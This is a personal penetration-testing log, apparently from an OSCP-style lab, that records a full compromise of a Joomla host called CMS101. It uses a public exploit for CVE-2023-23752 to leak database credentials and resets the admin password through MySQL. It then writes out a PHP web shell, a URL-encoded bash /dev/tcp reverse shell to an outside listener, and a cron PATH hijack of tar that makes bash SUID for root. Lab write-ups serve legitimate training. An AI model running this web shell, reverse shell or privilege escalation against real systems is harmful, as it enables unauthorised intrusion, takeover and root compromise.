CMS101
๐งช Pentest Log: {{date:2025-08-28}}
๐ Target Information
- Machine Name: CMS101
- IP Address: 10.11.1.178
- Operating System: Linux
ip=10.11.1.178
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
wpscan --url http://$ip
Joomla 3.6.3 Test Site
Google for "joomla exploit", found
https://github.com/Acceis/exploit-CVE-2023-23752.git
Port 3306
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: Credential Leak
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://github.com/Acceis/exploit-CVE-2023-23752.git
ruby exploit.rb http://$ip
Users
[913] John Doe (joomlaadmin) - joomlaadmin@localhost.local - Super Users
Site info
Site name: Joomla Test Site
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false
Database info
DB type: mysql
DB host: localhost
DB user: joomla
DB password: PasSw0RdjO0ml4
DB name: joomla
DB prefix: eqa2g_
DB encryption 0
Login mysql with
joomla:PasSw0RdjO0ml4
Change joomlaadmin password
use joomla;
UPDATE eqa2g_users SET password='$2y$10$8lRxk7/g1aiqYt2gOKPoMeUGfkuXSzDYPKpmDMR8NGJVV1fJhcJAG' WHERE username='joomlaadmin';
Login joomlaadmin account and change the template page, add a shell.php page
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
http://10.11.1.178/templates/cassiopeia/shell.php?cmd=%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.16.1.1%2F80%200%3E%261
python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: apache
- Groups: 48(apache)
- Shell Type: reverse shell
๐ Enumeration
Scheduled Task:
cat /etc/crontab
found
SHELL=/bin/bash
PATH=.:/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html/administrator
tar cf /var/backups/backuplogs.tgz logs
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: PATH hijack
- Target Binary/Service: tar
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
cd /var/www/html/administrator
vi tar
#! /bin/bash
chmod +s /bin/bash
chmod +x tar
- Smash to root
bash -p
- Key File
bjtp6y5fv6derm7t3e2j